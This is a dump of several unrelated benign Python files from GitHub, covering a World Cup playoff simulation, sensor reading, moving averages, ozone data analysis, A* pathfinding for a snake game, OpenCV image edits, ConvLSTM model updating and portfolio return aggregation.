        playoffs[p] = [[control[c], control[c + 1]] for c in range(0, len(control) - 1, 1) if c % 2 == 0]
        for i in range(0, len(playoffs[p]), 1):
            game = playoffs[p][i]
            home = game[0]
            away = game[1]
            team_1 = find_stats(home)
            team_2 = find_stats(away)
            features_g1 = find_features(team_1, team_2)
            features_g2 = find_features(team_2, team_1)
            probs_g1 = gb.predict_proba([features_g1])
            probs_g2 = gb.predict_proba([features_g2])
            team_1_prob = (probs_g1[0][0] + probs_g2[0][1]) / 2
            team_2_prob = (probs_g2[0][0] + probs_g1[0][1]) / 2
            if actual_round != p:
                print("-" * 10)
                print("Starting simulation of %s" % (p))
                print("-" * 10)
                print("\n")
            if team_1_prob < team_2_prob:
                print("%s vs. %s: %s advances with prob %.2f" % (home, away, away, team_2_prob))
                next_rounds.append(away)
            else:
                print("%s vs. %s: %s advances with prob %.2f" % (home, away, home, team_1_prob))
                next_rounds.append(home)
            # Record both probabilities on the fixture for later inspection.
            game.append([team_1_prob, team_2_prob])
            playoffs[p][i] = game
            actual_round = p
    else:
        # Later rounds: pair up consecutive winners from the previous round.
        playoffs[p] = [[next_rounds[c], next_rounds[c + 1]] for c in range(0, len(next_rounds) - 1, 1) if c % 2 == 0]
        next_rounds = []
        for i in range(0, len(playoffs[p])):
            game = playoffs[p][i]
            home = game[0]
            away = game[1]
            team_1 = find_stats(home)
            team_2 = find_stats(away)
            features_g1 = find_features(team_1, team_2)
            features_g2 = find_features(team_2, team_1)
            probs_g1 = gb.predict_proba([features_g1])
            probs_g2 = gb.predict_proba([features_g2])
            team_1_prob = (probs_g1[0][0] + probs_g2[0][1]) / 2
            team_2_prob = (probs_g2[0][0] + probs_g1[0][1]) / 2
            if actual_round != p:
                print("-" * 10)
                print("Starting simulation of %s" % (p))
                print("-" * 10)
                print("\n")
            if team_1_prob < team_2_prob:
                print("%s vs. %s: %s advances with prob %.2f" % (home, away, away, team_2_prob))
                next_rounds.append(away)
            else:
                print("%s vs. %s: %s advances with prob %.2f" % (home, away, home, team_1_prob))
                next_rounds.append(home)
            game.append([team_1_prob, team_2_prob])
            playoffs[p][i] = game
            actual_round = p
#画球队晋级图
# import networkx as nx
# from networkx.drawing.nx_pydot import graphviz_layout
#
# plt.figure(figsize=(15, 10))
# G = nx.balanced_tree(2, 3)
#
# labels = []
#
# for p in playoffs.keys():
# for game in playoffs[p]:
# label = f"{game[0]}({round(game[2][0], 2)}) \n {game[1]}({round(game[2][1], 2)})"
# labels.append(label)
#
# labels_dict = {}
# labels_rev = list(reversed(labels))
#
# for l in range(len(list(G.nodes))):
# labels_dict[l] = labels_rev[l]
#
# pos = graphviz_layout(G, prog='twopi')
# labels_pos = {n: (k[0], k[1] - 0.08 * k[1]) for n, k in pos.items()}
# center = pd.DataFrame(pos).mean(axis=1).mean()
#
# nx.draw(G, pos=pos, with_labels=False, node_color=range(15), edge_color="#bbf5bb", width=10, font_weight='bold',
# cmap=plt.cm.Greens, node_size=5000)
# nx.draw_networkx_labels(G, pos=labels_pos, bbox=dict(boxstyle="round,pad=0.3", fc="white", ec="black", lw=.5, alpha=1),
# labels=labels_dict)
# texts = ["Round \nof 16", "Quarter \n Final", "Semi \n Final", "Final\n"]
# pos_y = pos[0][1] + 55
# for text in reversed(texts):
# pos_x = center
# pos_y -= 75
# plt.text(pos_y, pos_x, text, fontsize=18)
#
# plt.axis('equal')
# plt.show()
#这就是最后的模拟!巴西赢得了第六个冠军!希望我的预测是正确的。
#分析一下可能出现的麻烦也很好。比利时战胜了德国,最后被葡萄牙击败。阿根廷对荷兰的比赛非常紧张,荷兰的传球优势接近1%。
#同样的情况也发生在法国和英格兰之间,英格兰通过。我认为英格兰进入决赛是模拟比赛中最大的意外。
#更新:数据库更新了各国国家队在世界杯前的最后一场友谊赛,因此,一些模拟也发生了变化。
#法国队在四分之一决赛中击败了英格兰队,在半决赛中被葡萄牙队击败!葡萄牙进入决赛是一个巨大的惊喜!
#结语
#这样做的目的是通过机器学习来模拟我喜欢的东西(足球世界杯)来提高我的知识。
#我认为创造出我们可以在现实生活中看到结果的模型是很神奇的,这就是将要发生的事情!
#总的来说,我认为这个模型的预测就像看足球的人的常识一样。在模拟中没有什么大的惊喜。
#在小组赛中看到不知名球队的比赛也很好,比如伊朗对阵威尔士,或者塞内加尔对阵厄瓜多尔。
#我认为在这样的比赛中,这种模式对投注有很好的指导作用,因为大多数人对二线国家队的了解并不多。
| ace825093791/worldcup | TheModel.py | TheModel.py | py | 17,594 | python | en | code | 0 | github-code | 13 |
import sys

# Read the temperature of every 1-wire slave sensor registered with the bus
# master and print each reading in degrees Celsius, one per line.
#
# Fixes: file handles were opened without being closed on all paths (now
# handled with context managers) and the print used a pointless
# "str() + ..." prefix.

# Read the list of 1-wire slave ids.
with open('/sys/devices/w1_bus_master1/w1_master_slaves') as file:
    w1_slaves = file.readlines()

# Repeat the following steps for each 1-wire slave.
for line in w1_slaves:
    # Each line holds one slave id followed by a newline.
    w1_slave = line.split("\n")[0]
    # Read the sensor's raw report from sysfs.
    with open('/sys/bus/w1/devices/' + str(w1_slave) + '/w1_slave') as file:
        filecontent = file.read()
    # The second line of the report ends with "t=<millidegrees>"; token 9 is
    # that field (assumes the kernel w1_slave layout — unchanged from the
    # original parsing).
    stringvalue = filecontent.split("\n")[1].split(" ")[9]
    # Convert millidegrees to degrees Celsius.
    temperature = float(stringvalue[2:]) / 1000
    print("%.1f" % temperature)

# Quit the python script.
sys.exit(0)
| unixweb/myweather | temperature.py | temperature.py | py | 864 | python | en | code | 10 | github-code | 13 |
11537030937 | #####Information section#########
## Name: Jiang Li
## Email: riverlee2008@gmail.com
###############################
import numpy as np
import matplotlib.pyplot as plt
## An array A with 12 elements beginning at 5, containing consecutive odd numbers.
# FIX: dtype=np.float — the np.float alias was deprecated in NumPy 1.20 and
# removed in 1.24, so this line crashed on modern NumPy; the builtin float is
# the documented replacement (same float64 result).
A = np.linspace(start=5, stop=27, num=12, dtype=float)
## Compute the simple moving average (SMA) of an array with an adjustable
## window: the function takes the array (A) and a window width defaulting to 2.
def SMA(A, width=2):
    """Simple moving average of A over a sliding window of *width*.

    Returns an array of len(A) - width + 1 window means, cast back to
    A's dtype.
    """
    window_starts = range(len(A) - width + 1)
    window_means = [np.mean(A[start:start + width]) for start in window_starts]
    return np.array(window_means, dtype=A.dtype)
## Cumulative moving average of a collected SMA array.
def CMA(B):
    """Cumulative moving average: element i is the mean of B[:i + 1]."""
    counts = np.arange(1, len(B) + 1)
    return np.cumsum(B) / counts
width=2
B = SMA(A,width=width)
C = CMA(B)
## Print the results of the two calls above with a short description of the data:
print("The original array is", A)
print("Current window width=",width)
print("The SMA result is :",B)
print("The CMS of this SMA is: ",C)
## Plot:
### the sin of arrays B and C, with distinct color, linewidth, label, and a
### figure name passed to the plotting function; show the grid and legend.
plt.figure("Midterm")
plt.plot(np.sin(B),linewidth=1.5,linestyle="-",label="SMA",color='blue')
plt.plot(np.sin(C),linewidth=2.5,linestyle="-.",label="CMA",color='red')
plt.title("Midterm - Jiang")
plt.grid()
plt.legend(loc='upper right')
plt.show()
| riverlee/Certificate-Program-in-Data-Science.old | CSX433.3/Midterm/a_Jiang_midterm.py | a_Jiang_midterm.py | py | 1,681 | python | en | code | 0 | github-code | 13 |
24632835939 | #!/usr/bin/env python3
# pip install netCDF4
# pip install numpy
# pip install json
# pip install matplotlib
from netCDF4 import Dataset
import numpy as np
from numpy import ma
import json
import calendar
import matplotlib.pyplot as plt
'''<==========SET_DEF_VAL==========>'''
# Default grid position and label, used when interactive input is skipped.
lat = 15.46
long = 47.55
city = 'Brasilia'
'''<==========CREATE_MASS==========>'''
# Index 0 holds the all-months aggregate; indices 1..12 hold per-month values.
# NOTE(review): max/min/mean shadow the builtins of the same name; renaming
# would touch many call sites, so they are only flagged here.
max = np.zeros(13)
min = np.zeros(13)
mean = np.zeros(13)
# month[0] is calendar.month_name's empty first entry; 1..12 are month names.
month = []
for name in calendar.month_name:
    month.append(name)
# Years covered by the MSR-2 series used below.
years = [x for x in range(1979, 2019, 1)]
def ploting_ozon():
    """Plot the full 1979-2018 monthly ozone series plus the January-only
    sub-series, and save the figure as ozon.png.

    Reads the module-level ``res_col`` (masked array of monthly values),
    ``years`` and ``city``.
    """
    fig = plt.figure()
    a1 = fig.add_subplot(111, sharex='all')
    plt.title(f'{city}')
    plt.ylabel('average conc. of ozone since 1979 until 2018')
    # One tick per month across the 40-year span, labelled by year.
    a1.set_xticks(np.arange((2019 - 1979) * 12))
    a1.set_xticklabels(years, rotation=60)
    a1.tick_params(axis='x', which='major', labelsize=8)
    '''All'''
    a1.plot(res_col, color='orange')
    '''Jan'''
    # Pick every 12th sample (the Januaries) into a 40-element series.
    a = ma.masked_array([0 for x in range(40)], mask=[0 for x in range(40)])
    k = 0
    for i in range(len(res_col)):
        if i % 12 == 0:
            a[k] = res_col[i]
            k += 1
    a1.plot(a, color='b')
    #Jul
    '''
    x = 0
    for x in range(1979, 2019, 1):
        a.mask[x - 1979] = True
    k = 0
    for i in range(len(res_col)):
        if i % 12 == 6:
            a[k] = res_col[i]
            k += 1
    a1.plot(a, color='r')
    a1.legend(['all', 'jan', 'jul'])
    '''
    plt.savefig('ozon.png')
def ploting():
    """Plot per-month max/min/mean ozone (indices 1..12 of the module-level
    arrays) and save the figure as all_years_each_month.png."""
    fig = plt.figure()
    a1 = fig.add_subplot(111)
    plt.title(f'{city}')
    plt.ylabel('average concentration of ozone')
    a1.plot(max[1:13], color='r')
    a1.set_xticks(np.arange(12))
    a1.set_xticklabels(month[1:13], rotation=20)
    a1.plot(min[1:13], color='b')
    a1.plot(mean[1:13], color='orange')
    a1.legend(['max', ' min', 'mean'])
    plt.savefig('all_years_each_month.png')
    # plt.show()
def put_temp():
    """Fill the module-level max/min/mean arrays (index 0 = all data,
    1..12 = one calendar month each) and produce both plots.

    Works by re-masking the global ``res_col`` masked array so that only
    one month's samples are visible at a time; zero readings are masked
    out as missing.  NOTE: ``res_col``'s mask is permanently mutated as
    a side effect.
    """
    ploting_ozon()
    max[0] = res_col.max()  # ALL
    min[0] = res_col.min()  # ALL
    mean[0] = res_col.mean()  # ALL
    i = 0
    while i < 12:
        k = 0
        while k < len(res_col):
            res_col.mask[k] = True
            # t = k % 12, computed by repeated subtraction.
            t = k
            while t > 11:
                t -= 12
            if t == i:
                # Unmask samples of month i, except zero (missing) readings.
                res_col.mask[k] = False
                if res_col[k] == 0:
                    res_col.mask[k] = True
            k += 1
        max[i + 1] = res_col.max()
        min[i + 1] = res_col.min()
        mean[i + 1] = res_col.mean()
        i += 1
    ploting()
def save_data(dictData):
    """Serialise the collected statistics to ozon.json (pretty-printed)."""
    with open("ozon.json", "w", encoding="utf-8") as out_file:
        json.dump(dictData, out_file, indent=4, separators=(",", ": "))
def dict_data():
    """Assemble the per-month and overall min/max/mean statistics into a
    dict (keyed by month name, plus 'city', 'coordinates' and 'all') and
    write it to disk via save_data().

    Reads the module-level city, lat, long, month, min, max, mean.
    """
    dictData = {}
    dictData['city'] = f'{city}'
    dictData['coordinates'] = [lat, long]
    i = 1
    while i < len(month):
        dictData[month[i]] = ({'min': min[i], 'max': max[i], 'mean': mean[i]})
        i += 1
    dictData['all'] = ({'min': min[0], 'max': max[0], 'mean': mean[0]})
    save_data(dictData)
def f_read_val():
    """Interactively override the module-level lat/long/city defaults.

    Any invalid or empty entry aborts the whole update and keeps the
    defaults: the three new values are only committed together, at the
    end, once all of them have validated.

    Fix: the longitude prompt previously said "Type LAT" (copy-paste
    error); it now says "Type LONG".
    """
    global lat
    global long
    global city
    print(f'Default values:\nlat - {lat} : long - {long} : city - {city}\n')
    print(f'Enter the new values to change the coordinates and the city \n')
    while True:
        try:
            lat_tmp = float(input(f'Type LAT or press ENTER to skip: '))
        except ValueError:
            break
        if (lat_tmp < -90.) or (lat_tmp > 90.):
            break
        try:
            long_tmp = float(input(f'Type LONG or press ENTER to skip: '))
        except ValueError:
            break
        # NOTE(review): the lower bound -179.5 (not -180) looks tied to the
        # dataset's longitude grid; confirm against MSR-2 coordinates.
        if (long_tmp < -179.5) or (long_tmp > 180.):
            break
        try:
            city_tmp = str(input(f'Type CITY or press ENTER to skip:'))
        except ValueError:
            break
        lat = lat_tmp
        long = long_tmp
        city = city_tmp
        break
def main():
    """Open the MSR-2 ozone dataset, let the user override lat/long/city,
    extract the time series at that position into the global ``res_col``,
    then compute statistics, write ozon.json, and close the file."""
    global res_col
    data = Dataset('MSR-2.nc')
    temp_col = data.variables['Average_O3_column']
    # temp_std = data.variables['Average_O3_std'] ### NOT USE ###
    print(data)
    f_read_val()
    # NOTE(review): lat/long are used directly as array indices here, not
    # converted to grid indices — confirm this against the MSR-2 grid.
    res_col = temp_col[:, lat, long]
    put_temp()
    dict_data()
    data.close()
main()
'''<==========UNUSED_BLOCK==========>'''
''' CHECK KEYS AND ITEMS
print(data.dimensions.keys())
print('\n')
print(data.variables.keys())
print('\n')
print(data.dimensions.items())
print('\n')
print(data.variables.items())
print('\n')
'''
| artemk1337/ozon | ozon.py | ozon.py | py | 4,616 | python | en | code | 0 | github-code | 13 |
def solution(numbers):
    """Return the sorted distinct sums of every pair of elements of *numbers*
    taken at two different indices.

    Fixes: leftover debug prints, and an O(n) ``in answer`` list-membership
    test inside the O(n^2) pair loop — a set handles deduplication in O(1)
    per sum.
    """
    pair_sums = {numbers[i] + numbers[j]
                 for i in range(len(numbers))
                 for j in range(i + 1, len(numbers))}
    return sorted(pair_sums)
print(solution([2,1,3,4,1])) | BlueScreenMaker/333_Algorithm | 백업/~220604/programmers/두개를뽑아더하기.py | 두개를뽑아더하기.py | py | 365 | python | en | code | 0 | github-code | 13 |
16840198967 | import cv2
import numpy as np
from functions import stack_images
img = cv2.imread('resources/lena.png')
kernel = np.ones((5,5),np.uint8)  # 5x5 structuring element for dilate/erode
#change image look
imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) #note: opencv uses BGR by default
imgBlur = cv2.GaussianBlur(imgGray,(7,7),0) # (7,7) is the kernel size; both must be odd
imgCanny = cv2.Canny(imgGray,100,100) #edge detection
imgDialated = cv2.dilate(imgCanny,kernel,iterations=1) #join edges; more iterations -> thicker lines
imgEroded = cv2.erode(imgDialated,kernel,iterations = 1) #opposite of dilate
cv2.imshow('gray lena',imgGray)
cv2.imshow('blured lena',imgBlur)
cv2.imshow('edgy lena',imgCanny)
cv2.imshow('edgy dialated lena',imgDialated)
cv2.imshow('edgy dialated eroded lena',imgEroded)
cv2.waitKey(0)  # block until a key is pressed
#resize and crop
img = cv2.imread(r'resources\megumin_chibi.jpg')
img_shape = img.shape  # (height, width, channels)
print(img_shape)
# BUG FIX: cv2.resize takes dsize as (width, height), but numpy's shape is
# (height, width) — the original passed (shape[0]//2, shape[1]//2), which
# swaps the axes and distorts any non-square image.
imgResized = cv2.resize(img, (img_shape[1]//2, img_shape[0]//2))
imgCropped = imgResized[0:250, 0:500]  # note: numpy slicing order is height, width
print(imgResized.shape)
cv2.imshow('megubig', img)
cv2.imshow('megusmall', imgResized)
cv2.imshow('meguhat', imgCropped)
cv2.waitKey(0)
#warpPerspective: straighten a quadrilateral region into a width x height image
img = cv2.imread('resources/deathnote.jpg')
width,height = 224,300
# Source corners and the rectangle corners they map onto; pts2 lists
# top-left, top-right, bottom-right, bottom-left.
pts1 = np.float32([[2,56],[111,11],[225,134],[112,193]])
pts2 = np.float32([[0,0],[width,0],[width,height],[0,height]])
tmatrix = cv2.getPerspectiveTransform(pts1,pts2) #3x3 transformation matrix (numpy.ndarray)
print(tmatrix.shape)
imgOutput = cv2.warpPerspective(img,tmatrix,(width,height))
cv2.imshow('image',img)
cv2.imshow('imageWarped',imgOutput)
cv2.waitKey(0)
#stack images
img = cv2.imread(r'resources\naruto_shadow.jpg')
print(img.shape)
imgHor = np.hstack((img,img))  # two copies side by side
imgVer = np.vstack((img,img))  # two copies stacked vertically
# Helper from functions.py builds a 2x3 grid; 0.5 is presumably a scale
# factor — see stack_images in functions.py.
imgStacked = stack_images([[img,img,img],[img,img,img]],0.5)
cv2.imshow('Hshadow_clones',imgHor)
cv2.imshow('Vshadow_clones',imgVer)
cv2.imshow('shadow_clones',imgStacked)
cv2.waitKey(0)
| akshaysmin/opencv-practice | chapter2_pic_edits.py | chapter2_pic_edits.py | py | 2,003 | python | en | code | 0 | github-code | 13 |
39111335736 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import setuptools
# The PyPI long description is taken verbatim from the README.
with open('README.rst') as f:
    long_description = f.read()
# NOTE(review): the url lacks a user/org path segment — presumably it should
# be the full repository URL; confirm before publishing.
setuptools.setup(
    name='sportsref',
    version='1.0.0',
    description='Sports reference scraper',
    long_description=long_description,
    author='J. Scott Moreland',
    author_email='morelandjs@gmail.com',
    url='https://github.com/sports_reference.git',
    license='MIT',
    packages=['sportsref'],
)
| morelandjs/sportsref | setup.py | setup.py | py | 446 | python | en | code | 1 | github-code | 13 |
# Read three dimensions and print every (i, j, k) combination plus the total count.
r, g, b = map(int, input().split())
count = 0
for red in range(r):
    for green in range(g):
        for blue in range(b):
            print(red, green, blue)
            count += 1
print(count)
# The total could also be computed directly as r * g * b, without a counter.
# print(r * g * b) result 선언 없이 이렇게 가능 | WeeYoungSeok/python_coding_study | codeup_100/problem_83.py | problem_83.py | py | 240 | python | en | code | 0 | github-code | 13 |
42648379172 | """A graph used for A* pathfinding"""
class Graph(object):
    """Grid graph used for A* pathfinding on the battlesnake board.

    Nodes are (x, y) tuples; squares occupied by snake bodies are kept
    in ``inaccessible_nodes`` and excluded from neighbor expansion.
    """

    # Class-level defaults; per-instance values are set in __init__ so
    # instances no longer share one mutable list.
    inaccessible_nodes = []
    width = -1
    height = -1

    def __init__(self):
        self.inaccessible_nodes = []
        self.width = -1
        self.height = -1

    def init(self, width, height):
        """Initializes the graph with the board dimensions."""
        self.width = width
        self.height = height

    def update(self, blackboard):
        """Rebuild the blocked-node list from the blackboard's snakes.

        The last body coordinate of each snake is skipped
        (range(len - 1)), matching the original behavior.
        """
        self.inaccessible_nodes = []
        for snake in blackboard['snakes']:
            coords = snake['coords']
            for index in range(len(coords) - 1):
                coord = coords[index]
                self.inaccessible_nodes.append((coord[0], coord[1]))

    def neighbors(self, node):
        """Return the accessible, in-bounds 4-neighbors of *node*.

        BUG FIX: the bounds check previously tested *node* instead of
        the candidate *neighbor*, so off-board neighbors were returned
        whenever the node itself was on the board.
        """
        directions = [[1, 0], [0, 1], [-1, 0], [0, -1]]
        results = []
        for direction in directions:
            neighbor = (node[0] + direction[0], node[1] + direction[1])
            if self.is_node_in_bounds(neighbor) and neighbor not in self.inaccessible_nodes:
                results.append(neighbor)
        return results

    def cost(self, node_1, node_2):
        """Manhattan distance between two nodes."""
        (x_coord_1, y_coord_1) = node_1
        (x_coord_2, y_coord_2) = node_2
        return abs(x_coord_1 - x_coord_2) + abs(y_coord_1 - y_coord_2)

    def farthest_node(self, node_1):
        """Return a reachable node of maximal Manhattan distance from *node_1*.

        Returns (-1, -1) only if even *node_1* itself is unreachable
        (the flood fill always contains the start node, so in practice
        the start is the fallback).
        """
        highest_cost_node = (-1, -1)
        highest_cost = -1
        for node_2 in self.__flood_fill(node_1):
            node_cost = self.cost(node_1, node_2)
            if node_cost > highest_cost:
                highest_cost_node = node_2
                highest_cost = node_cost
        return highest_cost_node

    def __flood_fill(self, node):
        """Collect every node reachable from *node* via accessible 4-neighbors."""
        directions = [[1, 0], [0, 1], [-1, 0], [0, -1]]
        results = [node]
        pending = [node]
        while pending:
            eval_node = pending.pop()
            for direction in directions:
                neighbor = (eval_node[0] + direction[0], eval_node[1] + direction[1])
                if (
                        neighbor not in results
                        and self.is_node_in_bounds(neighbor)
                        and neighbor not in self.inaccessible_nodes
                ):
                    results.append(neighbor)
                    pending.append(neighbor)
        return results

    def is_node_in_bounds(self, node):
        """True when *node* lies inside the width x height board."""
        (x_coord, y_coord) = node
        return 0 <= x_coord < self.width and 0 <= y_coord < self.height
| dlsteuer/battlesnake | snake/Graph.py | Graph.py | py | 2,891 | python | en | code | 0 | github-code | 13 |
72338009939 | import os
import argparse
import random
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from sklearn.metrics import mean_squared_error, mean_absolute_error
from model import ConvLSTMModel
from update_build_dataloader import get_dataloader
def return_perf(y_true, y_pred):
    """Return (MSE, MAE, MAPE-in-percent) between true and predicted values.

    Computed directly with numpy; equivalent to sklearn's
    ``mean_squared_error`` / ``mean_absolute_error`` for 1-D inputs, so the
    metric computation carries no extra dependency.

    NOTE: MAPE divides by ``y_true`` and is undefined when it contains zeros.
    """
    y_true = np.asarray(y_true, dtype=np.float64)
    y_pred = np.asarray(y_pred, dtype=np.float64)
    errors = y_true - y_pred
    mse = np.mean(errors ** 2)
    mae = np.mean(np.abs(errors))
    mape = np.mean(np.abs(errors / y_true)) * 100
    return mse, mae, mape
def main(args):
    """Continual-update loop: for five sequential data blocks, evaluate the
    current model on the block, log/save the results, then fine-tune the
    model on that block and checkpoint it for the next iteration."""
    # Log files
    # Build the result-folder name from the data-source configuration flags.
    if args.use_total_phase:
        folder_name = 'result_source_total_phase'
        folder_name += '_split_{}'.format(args.img_split_type)
        source_data = 'total_phase'
    else:
        if args.use_time_phase:
            folder_name = 'result_source_time_phase'
            folder_name += '_split_{}'.format(args.img_split_type)
            source_data = 'time_phase'
        else:
            folder_name = 'result_source_'
            if args.use_weather_1:
                folder_name += '1'
            if args.use_weather_4:
                folder_name += '4'
            folder_name += '_split_{}_seed_{}'.format(args.img_split_type, args.iid)
            # e.g. 'result_source_14_split_0_seed_0' -> '14'
            source_data = folder_name.split('source_')[-1].split('_split')[0]
    save_path = os.path.join(args.save_root_path, folder_name, f'time_{args.use_time_phase}')
    os.makedirs(save_path, exist_ok=True)
    # NOTE(review): save_path must already contain a pretrained
    # 'best_model.pt' checkpoint before this script runs.
    inference_result = open(os.path.join(save_path, 'inference_result.txt'), 'w')
    update_log_loss = open(os.path.join(save_path, 'update_log_loss.txt'), 'w')
    # -------------------------------
    # LOAD PRETRAINED MODEL
    # -------------------------------
    model = ConvLSTMModel(args.mem_size, args.img_split_type)
    # Iterate over the five sequential data blocks (1..5).
    for i in range(1,6):
        # Reload the latest checkpoint (updated at the end of the previous
        # block's fine-tuning pass).
        model.load_state_dict(torch.load(os.path.join(save_path, 'best_model.pt')))
        model.cuda()
        print('[Data Block {}th]'.format(i))
        tst_loader = get_dataloader(
            args.brave_csv_path, args.brave_root_img_path, args.use_time_phase,
            args.img_split_type, args.batch_size, args.use_total_phase, use_prediction = False, group_num = i, save_path = None
        )
        # -------------------------------
        # INFERENCE WITH PRETRAINED MODEL
        # -------------------------------
        data_loaders = {'new_brave': tst_loader}
        results = {
            'new_brave': {'trues': np.array([]), 'preds': np.array([])}
        }
        print('==> Start Testing')
        for target_data in data_loaders:
            model.eval()
            with torch.no_grad():
                for inputs, targets in data_loaders[target_data]:
                    inputs = inputs.cuda()
                    outputs = model(inputs)
                    # Accumulate ground truth and predictions across batches.
                    results[target_data]['trues'] = np.r_[results[target_data]['trues'], targets.numpy()]
                    results[target_data]['preds'] = np.r_[results[target_data]['preds'], outputs.detach().cpu().numpy().squeeze(1)]
            mse, mae, mape = return_perf(results[target_data]['trues'], results[target_data]['preds'])
            print('Source: {} & Target: {}'.format(source_data, target_data))
            print('Test MSE: {:.4f}, MAE: {:.4f}, MAPE: {:.4f}\n'.format(mse, mae, mape))
            inference_result.write('[{}th data block] Test MSE: {:.4f}, MAE: {:.4f}, MAPE: {:.4f}\n'.format(i-1, mse, mae, mape))
            # Persist per-sample true/pred pairs before the model is updated.
            result = pd.DataFrame()
            result['true'] = list(results[target_data]['trues'])
            result['pred'] = list(results[target_data]['preds'])
            if args.use_total_phase:
                file_name = 'result_source_target_total_phase_beforeupdate{}th.csv'.format(i)
            else:
                file_name = 'result_source_{}_target_{}_beforeupdate{}th.csv'.format(source_data, target_data.split('_')[-1], i)
            result.to_csv(os.path.join(save_path, file_name), index=False)
        # -------------------------------
        # UPDATE MODEL WITH DATA BLOCK
        # -------------------------------
        print('==> Start Updating')
        new_loader = get_dataloader(
            args.brave_csv_path, args.brave_root_img_path, args.use_time_phase,
            args.img_split_type, args.batch_size, args.use_total_phase, group_num = i, use_prediction = True, save_path = save_path
        )
        criterion = nn.MSELoss()
        optimizer = torch.optim.RMSprop(model.parameters(), lr=args.lr)
        lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, args.step_size, args.decay_rate)
        best_loss = 10000  # NOTE(review): assigned but never used below.
        for epoch in range(args.num_epochs): # EPOCH: 5
            print('==> Start Epoch = {}'.format(epoch + 1))
            epoch_loss = 0
            # NOTE(review): this inner `i` shadows the outer data-block `i`;
            # harmless here because the outer for-loop reassigns it each
            # iteration and `i` is not read again after this point.
            for i, (inputs, targets) in enumerate(new_loader):
                inputs = inputs.cuda()
                targets = targets.cuda()
                outputs = model(inputs)
                loss = criterion(outputs, targets.unsqueeze(1))
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                epoch_loss += loss.item()
                if (i + 1) % 200 == 0:
                    print('Epoch: [{}][{}/{}]\t\t'
                          'Loss: {}\t\t'.format(epoch + 1, i + 1, len(new_loader), loss.item()))
            avg_loss = epoch_loss / len(new_loader)
            print('\nUpdating: Loss = {}'.format(avg_loss))
            update_log_loss.write('Updating loss after {} epoch = {}\n'.format(epoch + 1, avg_loss))
            # Checkpoint after every epoch; the next data block reloads this.
            torch.save(model.state_dict(), os.path.join(save_path, 'best_model.pt'))
            lr_scheduler.step()
    inference_result.close()
    update_log_loss.close()
update_log_loss.close()
if __name__ == '__main__':
    # CLI for the continual-update experiment; defaults mirror the original
    # training setup (paths point at the authors' machines).
    parser = argparse.ArgumentParser()
    parser.add_argument('--seed', type=int, default=42)
    parser.add_argument('--num-epochs', type=int, default=5, help='Number of epochs')
    parser.add_argument('--lr', type=float, default=1e-4, help='Learning rate')
    parser.add_argument('--step-size', type=int, default=10, help='Learning rate decay step')
    parser.add_argument('--decay-rate', type=float, default=0.5, help='Learning rate decay rate')
    parser.add_argument('--mem-size', type=int, default=256, help='ConvLSTM hidden state size')
    parser.add_argument('--save-root-path', type=str, default='./result')
    parser.add_argument('--batch-size', type=int, default=16, help='Training batch size')
    parser.add_argument('--iid', type=int, default=0)
    parser.add_argument('--img_split_type', type=int, default=0,
                        help='0: img to 3 frames vertically | 1: img to 5 frames vertically | 2: img to 3 frames horizontally')
    # Data-source selection flags.
    # NOTE(review): type=bool on argparse does not parse 'False' from the
    # command line as falsy; these flags are effectively set via defaults.
    parser.add_argument('--use-weather-1', type=bool, default=False)
    parser.add_argument('--use-weather-4', type=bool, default=False)
    parser.add_argument('--use-brave', type=bool, default=True)
    parser.add_argument('--use-total-phase', type=bool, default=False)
    parser.add_argument('--use-time-phase', type=bool, default=True)
    parser.add_argument('--weather-1-csv-path', type=str,
                        default='/media/heejeong/HDD2/project/daewoo/data/weather_1/wave_radar/weather_1_data_label_seed.csv',
                        help='Csv file directory of labels for weather1')
    parser.add_argument('--weather-1-root-img-path', type=str,
                        default='/media/heejeong/HDD2/project/daewoo/data/weather_1/data_crop/',
                        help='Csv file directory of labels for weather1')
    parser.add_argument('--weather-4-csv-path', type=str,
                        default='/media/heejeong/HDD2/project/daewoo/data/weather_4/wave_radar/weather_4_data_label_seed.csv',
                        help='Csv file directory of labels for weather4')
    parser.add_argument('--weather-4-root-img-path', type=str,
                        default='/media/heejeong/HDD2/project/daewoo/data/weather_4/data_crop/',
                        help='Folder directory of images for weather4')
    parser.add_argument('--weather-total-phase-csv-path', type=str,
                        default='/media/heejeong/HDD2/project/daewoo/data/weather_1_4_data_label_seed.csv',
                        help='Csv file directory of labels for weather1&4')
    parser.add_argument('--brave-csv-path', type=str,
                        default='../preprocessing/brave_data_label.csv')
    parser.add_argument('--brave-root-img-path', type=str,
                        default='/mnt/C83AFA0C3AF9F6F2/hyundai_brave/crop_data/')
    args, _ = parser.parse_known_args()
    main(args)
| lepoeme20/daewoo | convlstm/update.py | update.py | py | 8,668 | python | en | code | 0 | github-code | 13 |
21571728736 | import params
from google.cloud import datastore, storage, logging
import time
import pickle
import hashlib
import sys
import numpy as np
import portfolioGeneration
import portfolio
import dataAck
import warnings
import numpy as np
import pandas as pd
warnings.filterwarnings("ignore")
import multiprocessing as mp
def generateAllReturnsFromCache(allModels):
    """Join each model's cached return/prediction/slippage series into wide frames.

    Models whose cached data cannot be retrieved or joined are skipped
    (best effort) and excluded from the returned model list.

    Returns a tuple ``(aggregateReturns, aggregatePredictions,
    aggregateSlippageReturns, cleanedModels)``; the three frames are None
    when no model succeeds.
    """
    aggregateReturns = None
    aggregatePredictions = None
    aggregateSlippageReturns = None
    cleanedModels = []
    for mod in allModels:
        try:
            algoReturn, algoPredictions, algoSlippageAdjustedReturn = dataAck.getModelData(mod)
            print(mod.describe())
            # Name every series column after the model description so the
            # joined frames have one column per model.
            algoReturn.columns = [str(mod.describe())]
            algoPredictions.columns = [str(mod.describe())]
            algoSlippageAdjustedReturn.columns = [str(mod.describe())]
            if aggregateReturns is None:
                aggregateReturns = algoReturn
                aggregatePredictions = algoPredictions
                aggregateSlippageReturns = algoSlippageAdjustedReturn
            else:
                aggregateReturns = aggregateReturns.join(algoReturn)
                aggregatePredictions = aggregatePredictions.join(algoPredictions)
                aggregateSlippageReturns = aggregateSlippageReturns.join(algoSlippageAdjustedReturn)
            cleanedModels.append(mod)
        except Exception:
            # BUG FIX: was a bare "except:", which also swallowed
            # SystemExit/KeyboardInterrupt; keep the best-effort skip but
            # only for ordinary exceptions.
            print("SKIPPING", mod.describe())
